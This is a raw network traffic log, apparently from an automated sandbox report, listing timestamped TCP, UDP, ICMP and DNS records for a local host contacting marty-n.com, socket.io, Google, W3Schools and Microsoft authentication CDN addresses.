                                                                                                              Oct 25, 2024 22:23:36.102718115 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.105240107 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:36.105292082 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.105369091 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:36.105561018 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:36.105588913 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.136373043 CEST44349740185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.136569977 CEST49740443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.144202948 CEST44349740185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.144284010 CEST49740443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.147161007 CEST44349752185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.147372007 CEST44349752185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.147424936 CEST49752443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.148004055 CEST49752443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.148017883 CEST44349752185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.149106026 CEST49742443192.168.2.16192.229.133.221
                                                                                                              Oct 25, 2024 22:23:36.156028986 CEST49762443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.156059980 CEST44349762185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.156126976 CEST49762443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.156338930 CEST49762443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.156364918 CEST44349762185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.217195988 CEST4434974318.245.31.33192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.217226982 CEST4434974318.245.31.33192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.217323065 CEST49743443192.168.2.1618.245.31.33
                                                                                                              Oct 25, 2024 22:23:36.217334986 CEST4434974318.245.31.33192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.217420101 CEST49743443192.168.2.1618.245.31.33
                                                                                                              Oct 25, 2024 22:23:36.218106985 CEST4434974318.245.31.33192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.218157053 CEST49743443192.168.2.1618.245.31.33
                                                                                                              Oct 25, 2024 22:23:36.218163967 CEST4434974318.245.31.33192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.218199968 CEST4434974318.245.31.33192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.218269110 CEST49743443192.168.2.1618.245.31.33
                                                                                                              Oct 25, 2024 22:23:36.222688913 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.222701073 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.222749949 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.222771883 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.222790003 CEST49742443192.168.2.16192.229.133.221
                                                                                                              Oct 25, 2024 22:23:36.222795010 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.222846031 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.222882032 CEST49742443192.168.2.16192.229.133.221
                                                                                                              Oct 25, 2024 22:23:36.222882986 CEST49742443192.168.2.16192.229.133.221
                                                                                                              Oct 25, 2024 22:23:36.222913980 CEST49742443192.168.2.16192.229.133.221
                                                                                                              Oct 25, 2024 22:23:36.223670959 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.223751068 CEST49742443192.168.2.16192.229.133.221
                                                                                                              Oct 25, 2024 22:23:36.223768950 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.223789930 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.223812103 CEST49742443192.168.2.16192.229.133.221
                                                                                                              Oct 25, 2024 22:23:36.223853111 CEST49742443192.168.2.16192.229.133.221
                                                                                                              Oct 25, 2024 22:23:36.227085114 CEST49742443192.168.2.16192.229.133.221
                                                                                                              Oct 25, 2024 22:23:36.227119923 CEST44349742192.229.133.221192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.228116035 CEST49743443192.168.2.1618.245.31.33
                                                                                                              Oct 25, 2024 22:23:36.228132963 CEST4434974318.245.31.33192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.254369974 CEST44349740185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.254462004 CEST49740443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.262305021 CEST44349740185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.262382984 CEST49740443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.300827026 CEST44349740185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.300906897 CEST49740443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.382138014 CEST44349740185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.382220030 CEST49740443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.417851925 CEST44349740185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.417922020 CEST49740443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.417927980 CEST44349740185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.417998075 CEST49740443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.418914080 CEST49740443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:36.418936014 CEST44349740185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.435676098 CEST4434975420.236.24.53192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.435764074 CEST49754443192.168.2.1620.236.24.53
                                                                                                              Oct 25, 2024 22:23:36.435827971 CEST4434975420.236.24.53192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.435888052 CEST49754443192.168.2.1620.236.24.53
                                                                                                              Oct 25, 2024 22:23:36.445396900 CEST49754443192.168.2.1620.236.24.53
                                                                                                              Oct 25, 2024 22:23:36.445545912 CEST4434975420.236.24.53192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.445605040 CEST49754443192.168.2.1620.236.24.53
                                                                                                              Oct 25, 2024 22:23:36.538355112 CEST49766443192.168.2.1651.104.34.11
                                                                                                              Oct 25, 2024 22:23:36.538395882 CEST4434976651.104.34.11192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.538461924 CEST49766443192.168.2.1651.104.34.11
                                                                                                              Oct 25, 2024 22:23:36.544852972 CEST49766443192.168.2.1651.104.34.11
                                                                                                              Oct 25, 2024 22:23:36.544872046 CEST4434976651.104.34.11192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.679892063 CEST4434975513.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.680485964 CEST49755443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.680500984 CEST4434975513.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.681557894 CEST4434975513.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.681819916 CEST49755443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.681997061 CEST49755443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.682060003 CEST4434975513.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.682137012 CEST49755443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.686759949 CEST4434975613.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.687304020 CEST49756443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.687324047 CEST4434975613.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.688791990 CEST4434975613.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.688926935 CEST49756443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.689240932 CEST49756443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.689356089 CEST4434975613.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.689399004 CEST49756443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.691572905 CEST4434975713.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.692363024 CEST49757443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.692375898 CEST4434975713.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.694827080 CEST4434975813.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.696263075 CEST4434975713.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.696413040 CEST49757443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.696753979 CEST49757443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.696856022 CEST4434975713.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.696880102 CEST49757443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.696893930 CEST49758443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.696928024 CEST4434975813.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.698483944 CEST4434975813.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.698714018 CEST49758443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.698879957 CEST49758443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.698966026 CEST4434975813.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.698999882 CEST49758443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.727324963 CEST4434975513.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.731353045 CEST4434975613.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.736089945 CEST49755443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.736102104 CEST4434975513.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.736099958 CEST49756443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.736139059 CEST4434975613.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.739370108 CEST4434975713.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.743330956 CEST4434975813.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.751080036 CEST49757443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.751089096 CEST4434975713.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.751122952 CEST49758443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.751152039 CEST4434975813.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.782818079 CEST4434976013.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.783093929 CEST49756443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.783108950 CEST49755443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.784307957 CEST49760443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.784370899 CEST4434976013.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.787693977 CEST4434976013.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.787868977 CEST49760443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.788211107 CEST49760443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.788299084 CEST4434976013.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.788328886 CEST49760443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.799083948 CEST49757443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.799241066 CEST49758443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.814259052 CEST4434975513.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.814481020 CEST4434975513.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.814652920 CEST49755443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.815957069 CEST49755443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.815972090 CEST4434975513.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.824312925 CEST4434975713.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.824357033 CEST4434975713.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.824491978 CEST4434975713.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.824525118 CEST49757443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.824990034 CEST49757443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.825479031 CEST49757443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.825490952 CEST4434975713.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.830118895 CEST49760443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.830178976 CEST4434976013.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.831588030 CEST4434975613.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.831625938 CEST4434975613.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.831685066 CEST4434975613.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.831726074 CEST49756443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.831904888 CEST49756443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.833940983 CEST49756443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.833981037 CEST4434975613.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.855552912 CEST4434975813.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.874476910 CEST4434975813.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.874599934 CEST49758443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.876068115 CEST49758443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.876096010 CEST4434975813.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.878125906 CEST49760443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.912868977 CEST4434976013.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.913043022 CEST4434976013.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.913414001 CEST49760443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.914895058 CEST49760443192.168.2.1613.107.246.45
                                                                                                              Oct 25, 2024 22:23:36.914913893 CEST4434976013.107.246.45192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.124373913 CEST44349762185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.130088091 CEST49762443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:37.130119085 CEST44349762185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.130472898 CEST44349762185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.136055946 CEST49762443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:37.136055946 CEST49762443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:37.136130095 CEST44349762185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.162345886 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.166021109 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:37.166083097 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.167028904 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.167812109 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:37.167812109 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:37.167891026 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.170006037 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:37.196893930 CEST49762443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:37.211154938 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:37.211186886 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.258121967 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:37.401285887 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.401343107 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.401396036 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.401851892 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:37.402281046 CEST49761443192.168.2.16152.199.21.175
                                                                                                              Oct 25, 2024 22:23:37.402314901 CEST44349761152.199.21.175192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.443872929 CEST44349762185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.443938971 CEST44349762185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:37.444900036 CEST49762443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:37.445085049 CEST49762443192.168.2.16185.45.66.155
                                                                                                              Oct 25, 2024 22:23:37.445101023 CEST44349762185.45.66.155192.168.2.16
                                                                                                              Oct 25, 2024 22:23:38.677093983 CEST4434976651.104.34.11192.168.2.16
                                                                                                              Oct 25, 2024 22:23:38.677189112 CEST49766443192.168.2.1651.104.34.11

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Oct 25, 2024 22:22:38.222436905 CEST138138192.168.2.16192.168.2.255
                                                                                                              Oct 25, 2024 22:23:29.982085943 CEST53541641.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:29.990833044 CEST53622911.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:30.078269958 CEST5680053192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:30.078551054 CEST4997853192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:30.138767958 CEST53568001.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:30.172178984 CEST53499781.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:31.218178034 CEST53558651.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:33.173788071 CEST5937853192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:33.174097061 CEST5211553192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:33.181879044 CEST53521151.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:33.184885979 CEST53593781.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.240909100 CEST5042153192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:34.241065025 CEST6496453192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:34.332971096 CEST53504211.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.354044914 CEST53649641.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.554754019 CEST6194153192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:34.554878950 CEST6102353192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:34.562048912 CEST53619411.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.563707113 CEST53610231.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.734189987 CEST5834553192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:34.734766960 CEST5784953192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:34.752396107 CEST53583451.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.754492998 CEST6364953192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:34.754620075 CEST5362853192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:34.760150909 CEST53578491.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.763175964 CEST53536281.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.766578913 CEST53636491.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.777072906 CEST5730353192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:34.777224064 CEST6363753192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:34.785276890 CEST53573031.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.785861969 CEST53636371.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:34.870101929 CEST53576551.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.092458010 CEST5329553192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:36.092613935 CEST4991453192.168.2.161.1.1.1
                                                                                                              Oct 25, 2024 22:23:36.103041887 CEST53532951.1.1.1192.168.2.16
                                                                                                              Oct 25, 2024 22:23:36.104763985 CEST53499141.1.1.1192.168.2.16

                                                                                                              ICMP Packets

                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                              Oct 25, 2024 22:23:30.172391891 CEST192.168.2.161.1.1.1c231(Port unreachable)Destination Unreachable

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Oct 25, 2024 22:23:30.078269958 CEST192.168.2.161.1.1.10xc189Standard query (0)marty-n.comA (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:30.078551054 CEST192.168.2.161.1.1.10xf3d4Standard query (0)marty-n.com65IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:33.173788071 CEST192.168.2.161.1.1.10xec4aStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:33.174097061 CEST192.168.2.161.1.1.10xae39Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.240909100 CEST192.168.2.161.1.1.10x9a22Standard query (0)marty-n.comA (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.241065025 CEST192.168.2.161.1.1.10xc886Standard query (0)marty-n.com65IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.554754019 CEST192.168.2.161.1.1.10x3d19Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.554878950 CEST192.168.2.161.1.1.10x7d55Standard query (0)www.google.com65IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.734189987 CEST192.168.2.161.1.1.10xd4a2Standard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.734766960 CEST192.168.2.161.1.1.10x118Standard query (0)www.w3schools.com65IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.754492998 CEST192.168.2.161.1.1.10x15b5Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.754620075 CEST192.168.2.161.1.1.10x6906Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.777072906 CEST192.168.2.161.1.1.10xcd16Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.777224064 CEST192.168.2.161.1.1.10xb1abStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:36.092458010 CEST192.168.2.161.1.1.10x1314Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:36.092613935 CEST192.168.2.161.1.1.10xcdb6Standard query (0)aadcdn.msftauth.net65IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Oct 25, 2024 22:23:30.138767958 CEST1.1.1.1192.168.2.160xc189No error (0)marty-n.com185.45.66.155A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:33.181879044 CEST1.1.1.1192.168.2.160xae39No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:33.184885979 CEST1.1.1.1192.168.2.160xec4aNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:33.184885979 CEST1.1.1.1192.168.2.160xec4aNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:33.184885979 CEST1.1.1.1192.168.2.160xec4aNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:33.184885979 CEST1.1.1.1192.168.2.160xec4aNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:33.184885979 CEST1.1.1.1192.168.2.160xec4aNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.332971096 CEST1.1.1.1192.168.2.160x9a22No error (0)marty-n.com185.45.66.155A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.562048912 CEST1.1.1.1192.168.2.160x3d19No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.563707113 CEST1.1.1.1192.168.2.160x7d55No error (0)www.google.com65IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.752396107 CEST1.1.1.1192.168.2.160xd4a2No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.752396107 CEST1.1.1.1192.168.2.160xd4a2No error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.760150909 CEST1.1.1.1192.168.2.160x118No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.763175964 CEST1.1.1.1192.168.2.160x6906No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.766578913 CEST1.1.1.1192.168.2.160x15b5No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.766578913 CEST1.1.1.1192.168.2.160x15b5No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.766578913 CEST1.1.1.1192.168.2.160x15b5No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.766578913 CEST1.1.1.1192.168.2.160x15b5No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.766578913 CEST1.1.1.1192.168.2.160x15b5No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.783358097 CEST1.1.1.1192.168.2.160x125cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.783358097 CEST1.1.1.1192.168.2.160x125cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.785276890 CEST1.1.1.1192.168.2.160xcd16No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Oct 25, 2024 22:23:34.785276890 CEST1.1.1.1192.168.2.160xcd16No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
